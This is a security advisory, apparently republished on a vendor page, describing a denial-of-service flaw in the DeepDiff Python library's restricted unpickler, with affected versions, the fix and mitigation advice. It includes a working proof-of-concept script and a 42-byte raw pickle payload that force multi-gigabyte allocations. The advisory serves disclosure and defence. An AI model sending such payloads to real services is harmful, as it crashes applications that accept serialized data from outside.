GHSA-54jj-px8x-5w5q
DeepDiff has Memory Exhaustion DoS through SAFE_TO_IMPORT
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
deepdiffReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The pickle unpickler _RestrictedUnpickler validates which classes can be loaded but does not limit their constructor arguments. A few of the types in SAFE_TO_IMPORT have constructors that allocate memory proportional to their input (builtins.bytes, builtins.list, builtins.range). A 40-byte pickle payload can force 10+ GB of memory, which crashes applications that load delta objects or call pickle_load with untrusted data.
Details
CVE-2025-58367 hardened the delta class against pollution and remote code execution by converting SAFE_TO_IMPORT to a frozenset and blocking traversal. _RestrictedUnpickler.find_class only gates which classes can be loaded. It doesn't intercept REDUCE opcodes or validate what is passed to constructors.
It can be exploited in 2 ways.
1 - During pickle_load
A pickle that calls bytes(N) using opcodes permitted by the allowlist. The allocation happens during deserialization and before the delta processes anything. The restricted unpickler does not override load_reduce so any allowed class can be called.
GLOBAL builtins.bytes (passes find_class check — serialization.py:353)
INT 10000000000 (10 billion)
TUPLE + REDUCE → bytes(10**10) → allocates ~9.3 GB
2 - During delta application
A valid diff dict that first sets a value to a large int via values_changed, then converts it to bytes via type_changes. It works because _do_values_changed() runs before _do_type_changes() in Delta.add() in delta.py line 183. Step 1 modifies the target in place before step 2 reads the modified value and calls new_type(current_old_value) at delta.py line 576 with no size guard.
PoC
The script uses Python's resource module to cap memory to 1 GB so you can reproduce safely without hitting the OOM killer. It loads deepdiff first, applies the limit, then runs the payload. Change 10**8 to 10**10 for the full 9.3 GB allocation.
import resource
import sys
def limit_memory(maxsize_mb):
"""Cap virtual memory for this process."""
soft, hard = resource.getrlimit(resource.RLIMIT_AS)
maxsize_bytes = maxsize_mb * 1024 * 1024
try:
resource.setrlimit(resource.RLIMIT_AS, (maxsize_bytes, hard))
print(f"[*] Memory limit set to {maxsize_mb} MB")
except ValueError:
print("[!] Failed to set memory limit.")
sys.exit(1)
# Load heavy imports before enforcing the limit
from deepdiff import Delta
from deepdiff.serialization import pickle_dump, pickle_load
limit_memory(1024)
# --- Delta application path ---
payload_dict = {
'values_changed': {"root['x']": {'new_value': 10**8}},
'type_changes': {"root['x']": {'new_type': bytes}},
}
payload1 = pickle_dump(payload_dict)
print(f"Payload size: {len(payload1)} bytes")
target = {'x': 'anything'}
try:
result = target + Delta(payload1)
print(f"Allocated: {len(result['x']) // 1024 // 1024} MB")
print(f"Amplification: {len(result['x']) // len(payload1)}x")
except MemoryError:
print("[!] MemoryError — payload tried to allocate too much")
# --- Raw pickle path ---
payload2 = (
b"(dp0\n"
b"S'_'\n"
b"cbuiltins\nbytes\n"
b"(I100000000\n"
b"tR"
b"s."
)
print(f"Payload size: {len(payload2)} bytes")
try:
result2 = pickle_load(payload2)
print(f"Allocated: {len(result2['_']) // 1024 // 1024} MB")
except MemoryError:
print("[!] MemoryError — payload tried to allocate too much")
Output:
[*] Memory limit set to 1024 MB
Payload size: 123 bytes
Allocated: 95 MB
Amplification: 813008x
Payload size: 42 bytes
Allocated: 95 MB
Impact
Denial of service. Any application that deserializes delta objects or calls pickle_load with untrusted inputs can be crashed with a small payload. The restricted unpickler is meant to make this safe. It prevents remote code execution but doesn't prevent resource exhaustion.
The amplification is large. 800,000x for delta and 2,000,000x for raw pickle.
Impacted users are anyone who accepts serialized delta objects from untrusted sources — network APIs, file uploads, message queues, etc.
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | deepdiff | ≥ 5.0.0&&< 8.6.2 | 8.6.2 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for deepdiff. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update deepdiff to 8.6.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-54jj-px8x-5w5q is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-54jj-px8x-5w5q is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-54jj-px8x-5w5q. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-54jj-px8x-5w5q in your dependencies?
O3 detects GHSA-54jj-px8x-5w5q across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.